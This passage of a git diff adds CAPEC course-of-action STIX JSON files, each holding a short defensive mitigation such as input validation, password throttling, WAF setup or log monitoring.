newline at end of file diff --git a/capec/course-of-action/course-of-action--2db6f425-6fb9-40de-9d29-7f217e0df641.json b/capec/course-of-action/course-of-action--2db6f425-6fb9-40de-9d29-7f217e0df641.json new file mode 100644 index 0000000000..5e8c8ddfa5 --- /dev/null +++ b/capec/course-of-action/course-of-action--2db6f425-6fb9-40de-9d29-7f217e0df641.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4e5e0b49-23c1-4abd-8553-9040fcb46111", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2db6f425-6fb9-40de-9d29-7f217e0df641", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-575-0", + "description": "Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by process whitelisting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2eb65f7c-003a-4479-b5f2-16f6e5794151.json b/capec/course-of-action/course-of-action--2eb65f7c-003a-4479-b5f2-16f6e5794151.json new file mode 100644 index 0000000000..1e81478992 --- /dev/null +++ b/capec/course-of-action/course-of-action--2eb65f7c-003a-4479-b5f2-16f6e5794151.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--89479736-5e8d-4032-b03d-7f7683fefaca", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2eb65f7c-003a-4479-b5f2-16f6e5794151", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-45-3", + "description": "Always check the size of the input data before copying to a buffer.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2f881ca2-2823-42d7-b6bd-de209f7d169e.json b/capec/course-of-action/course-of-action--2f881ca2-2823-42d7-b6bd-de209f7d169e.json new file mode 100644 index 0000000000..f3ffd51e75 --- /dev/null +++ b/capec/course-of-action/course-of-action--2f881ca2-2823-42d7-b6bd-de209f7d169e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7e1980a2-c5a3-4c98-b2c7-52b45432361f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2f881ca2-2823-42d7-b6bd-de209f7d169e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-307-0", + "description": "Typically, an IDS/IPS system is very effective against this type of attack.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--2f9fa820-a8e2-42a0-9940-2fa454c03dab.json b/capec/course-of-action/course-of-action--2f9fa820-a8e2-42a0-9940-2fa454c03dab.json new file mode 100644 index 0000000000..ea517bbb10 --- /dev/null +++ b/capec/course-of-action/course-of-action--2f9fa820-a8e2-42a0-9940-2fa454c03dab.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e4599217-c038-4ab1-b5de-bdf9cd756a06", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--2f9fa820-a8e2-42a0-9940-2fa454c03dab", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-465-0", + "description": "\n Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.\n Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420.json b/capec/course-of-action/course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420.json new file mode 100644 index 0000000000..a78164b96b --- /dev/null +++ b/capec/course-of-action/course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6151c269-6357-4c8a-9255-d5b250847ee0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-199-0", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3.json b/capec/course-of-action/course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3.json new file mode 100644 index 0000000000..f41ec2d816 --- /dev/null +++ b/capec/course-of-action/course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4aa86b89-a3bd-4f13-b7a5-c76eb2e2a63b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-614-0", + "description": "Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa.json b/capec/course-of-action/course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa.json new file mode 100644 index 0000000000..3b9182a558 --- /dev/null +++ b/capec/course-of-action/course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ba31f18c-bae8-4899-9326-e07afe0db1c1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-141-0", + "description": "Configuration: Disable client side caching.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757.json b/capec/course-of-action/course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757.json new file mode 100644 index 0000000000..b9546ec912 --- /dev/null +++ b/capec/course-of-action/course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f8d5594b-7880-4a8b-8eca-bd32aaf33876", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-2-0", + "description": "Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--31915125-c52a-4627-a701-7170b8709fbc.json b/capec/course-of-action/course-of-action--31915125-c52a-4627-a701-7170b8709fbc.json new file mode 100644 index 0000000000..de401c9fd3 --- /dev/null +++ b/capec/course-of-action/course-of-action--31915125-c52a-4627-a701-7170b8709fbc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--44461871-92dd-456a-958e-c044e709db1c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--31915125-c52a-4627-a701-7170b8709fbc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-105-2", + "description": "Install a web application firewall that has been secured against HTTP Request Splitting", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30.json b/capec/course-of-action/course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30.json new file mode 100644 index 0000000000..2f0f09e619 --- /dev/null +++ b/capec/course-of-action/course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--599568f4-7e33-4e8e-86f6-95f0a02377bb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-240-0", + "description": "Ensure all input content that is delivered to client is sanitized against an acceptable content specification.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--33145ebc-8ed7-4a1f-a283-c5ba0073367b.json b/capec/course-of-action/course-of-action--33145ebc-8ed7-4a1f-a283-c5ba0073367b.json new file mode 100644 index 0000000000..f470f6490e --- /dev/null +++ b/capec/course-of-action/course-of-action--33145ebc-8ed7-4a1f-a283-c5ba0073367b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--65202fd2-d06e-4005-9def-765707e27fa2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--33145ebc-8ed7-4a1f-a283-c5ba0073367b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-466-0", + "description": "\n Design: Tunnel communications through a secure proxy\n Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b.json b/capec/course-of-action/course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b.json new file mode 100644 index 0000000000..e83d6a37e7 --- /dev/null +++ b/capec/course-of-action/course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c6e54003-a24f-4628-afcd-7dfff1a8ac6e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-96-0", + "description": "Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--34b67659-f7a2-4c8c-97b2-84a3d743bbd0.json b/capec/course-of-action/course-of-action--34b67659-f7a2-4c8c-97b2-84a3d743bbd0.json new file mode 100644 index 0000000000..1b96c0bd0a --- /dev/null +++ b/capec/course-of-action/course-of-action--34b67659-f7a2-4c8c-97b2-84a3d743bbd0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--39f2d585-ca20-41c7-b69e-f9c5b5bf0a46", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--34b67659-f7a2-4c8c-97b2-84a3d743bbd0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-271-1", + "description": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the schema document.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f.json b/capec/course-of-action/course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f.json new file mode 100644 index 0000000000..e284678395 --- /dev/null +++ b/capec/course-of-action/course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1e7ecbb3-3db3-47d7-ae0b-dd1bf8a665b9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-641-4", + "description": "Require code signing and avoid using relative paths for resources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--36186001-cd10-4add-b390-984e37252cc1.json b/capec/course-of-action/course-of-action--36186001-cd10-4add-b390-984e37252cc1.json new file mode 100644 index 0000000000..a217355ae1 --- /dev/null +++ b/capec/course-of-action/course-of-action--36186001-cd10-4add-b390-984e37252cc1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9d2f0a0a-aa80-4f22-8f77-830e0b979b3a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--36186001-cd10-4add-b390-984e37252cc1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-460-0", + "description": "\n Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests\n Design: Perform URL encoding\n Implementation: Use strict regular expressions in URL rewriting\n Implementation: Beware of multiple occurrences of a parameter in a Query String\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3661b9f7-963d-4aaa-a0fd-26866bbfe977.json b/capec/course-of-action/course-of-action--3661b9f7-963d-4aaa-a0fd-26866bbfe977.json new file mode 100644 index 0000000000..3a30ab4884 --- /dev/null +++ b/capec/course-of-action/course-of-action--3661b9f7-963d-4aaa-a0fd-26866bbfe977.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--95d604c3-deed-403f-88dd-99a52705d939", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3661b9f7-963d-4aaa-a0fd-26866bbfe977", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-488-0", + "description": "To mitigate this type of an attack, an organization can monitor the typical traffic flow. When spikes in usage occur, filters could examine traffic for indicators of bad behavior with respect to the web servers, and then create firewall rules to deny the malicious IP addresses. These patterns in the filter could be a combination of trained behavior, knowledge of standards as they apply to the web server, known patterns, or anomaly detection. Firewalling source IPs works since the HTTP is sent using TCP so the source IP can't be spoofed; if the source IP is spoofed is, then it's not legitimate traffic. Special care should be taken care with rule sets to ensure low false positive rates along with a method at the application layer to allow a valid user to begin using the service again. Another possible solution is using 3rd party providers as they have experts, knowledge, experience, and resources to deal with the attack and mitigate it before hand or while it occurs. The best mitigation is preparation before an attack, but there is no bulletproof solution as with ample resources a brute force attack may succeed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c.json b/capec/course-of-action/course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c.json new file mode 100644 index 0000000000..7ffaf7e24c --- /dev/null +++ b/capec/course-of-action/course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c70b19b8-12c1-4300-afe5-4288b94693e4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-77-1", + "description": "A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--36a18ef6-828f-4581-8a24-52bfd4172d28.json b/capec/course-of-action/course-of-action--36a18ef6-828f-4581-8a24-52bfd4172d28.json new file mode 100644 index 0000000000..bee38b11ae --- /dev/null +++ b/capec/course-of-action/course-of-action--36a18ef6-828f-4581-8a24-52bfd4172d28.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--242284f3-eb12-41e2-a31b-9143eacac193", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--36a18ef6-828f-4581-8a24-52bfd4172d28", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-188-0", + "description": "Employ code obfuscation techniques to prevent the adversary from reverse engineering the targeted entity.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3708e269-8e45-425f-bf69-d91b54911e5c.json b/capec/course-of-action/course-of-action--3708e269-8e45-425f-bf69-d91b54911e5c.json new file mode 100644 index 0000000000..1d97f26393 --- /dev/null +++ b/capec/course-of-action/course-of-action--3708e269-8e45-425f-bf69-d91b54911e5c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--dd838d69-49ed-43fa-a1ee-7963b45bf181", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3708e269-8e45-425f-bf69-d91b54911e5c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-34-0", + "description": "To avoid HTTP Response Splitting, the application must not rely on user-controllable input to form part of its output response stream. Specifically, response splitting occurs due to injection of CR-LF sequences and additional headers. All data arriving from the user and being used as part of HTTP response headers must be subjected to strict validation that performs simple character-based as well as semantic filtering to strip it of malicious character sequences and headers.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5.json b/capec/course-of-action/course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5.json new file mode 100644 index 0000000000..5f9de04cdc --- /dev/null +++ b/capec/course-of-action/course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ed76b1c2-cacc-4b40-a220-5e70a73747f7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-127-1", + "description": "2. Preventing with .htaccess in Apache web server: In .htaccess, write \"Options-indexes\".", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--37dc71fb-c194-4497-9f50-a2c549861e0c.json b/capec/course-of-action/course-of-action--37dc71fb-c194-4497-9f50-a2c549861e0c.json new file mode 100644 index 0000000000..4b05c54cdb --- /dev/null +++ b/capec/course-of-action/course-of-action--37dc71fb-c194-4497-9f50-a2c549861e0c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ca6c1e71-b0fd-4610-9d12-3e745d3a9968", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--37dc71fb-c194-4497-9f50-a2c549861e0c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-308-0", + "description": "Firewalls or ACLs which block egress ICMP error types effectively prevent UDP scans from returning any useful information.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec.json b/capec/course-of-action/course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec.json new file mode 100644 index 0000000000..c0bcc902c8 --- /dev/null +++ b/capec/course-of-action/course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--569598c0-fe15-4640-9452-5a37b7cc77c9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-68-0", + "description": "A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517.json b/capec/course-of-action/course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517.json new file mode 100644 index 0000000000..557613cdb2 --- /dev/null +++ b/capec/course-of-action/course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2dd171e5-1aaa-4cac-b02e-4ff6ec1fde0b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-644-1", + "description": "Monitor system and domain logs for abnormal credential access.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf.json b/capec/course-of-action/course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf.json new file mode 100644 index 0000000000..b57edecf74 --- /dev/null +++ b/capec/course-of-action/course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1b3b044b-6aa5-43c1-871c-7082ef1c6c0e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-230-0", + "description": "Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957.json b/capec/course-of-action/course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957.json new file mode 100644 index 0000000000..eeb402a785 --- /dev/null +++ b/capec/course-of-action/course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--40f73bbb-de02-4404-ad44-aa46222527c6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-15-0", + "description": "Design: Perform whitelist validation against a positive specification for command length, type, and parameters.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--39addebd-df68-43c2-84f2-ae1ba9653ad8.json b/capec/course-of-action/course-of-action--39addebd-df68-43c2-84f2-ae1ba9653ad8.json new file mode 100644 index 0000000000..f4d5254a74 --- /dev/null +++ b/capec/course-of-action/course-of-action--39addebd-df68-43c2-84f2-ae1ba9653ad8.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1c31d082-ac41-4a79-aa8b-1e545a93394f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--39addebd-df68-43c2-84f2-ae1ba9653ad8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-245-1", + "description": "Implementation: Normalize, filter and sanitize all user supplied fields.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3a00550f-fc0c-4882-a97f-c5d874abb7e3.json b/capec/course-of-action/course-of-action--3a00550f-fc0c-4882-a97f-c5d874abb7e3.json new file mode 100644 index 0000000000..9d980e2a0a --- /dev/null +++ b/capec/course-of-action/course-of-action--3a00550f-fc0c-4882-a97f-c5d874abb7e3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--52c7b90f-2208-4778-8270-5fed2289a793", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3a00550f-fc0c-4882-a97f-c5d874abb7e3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-507-0", + "description": "To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989.json b/capec/course-of-action/course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989.json new file mode 100644 index 0000000000..a789ea44e5 --- /dev/null +++ b/capec/course-of-action/course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d346874b-46b2-4773-ad61-52181a260cb8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-135-0", + "description": "Limit the usage of formatting string functions.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--3a98e579-34f3-4645-b229-ead3e426f738.json b/capec/course-of-action/course-of-action--3a98e579-34f3-4645-b229-ead3e426f738.json new file mode 100644 index 0000000000..6ab8288087 --- /dev/null +++ b/capec/course-of-action/course-of-action--3a98e579-34f3-4645-b229-ead3e426f738.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0849a1c8-161b-4441-9236-0d0ede08ca82", + "spec_version": 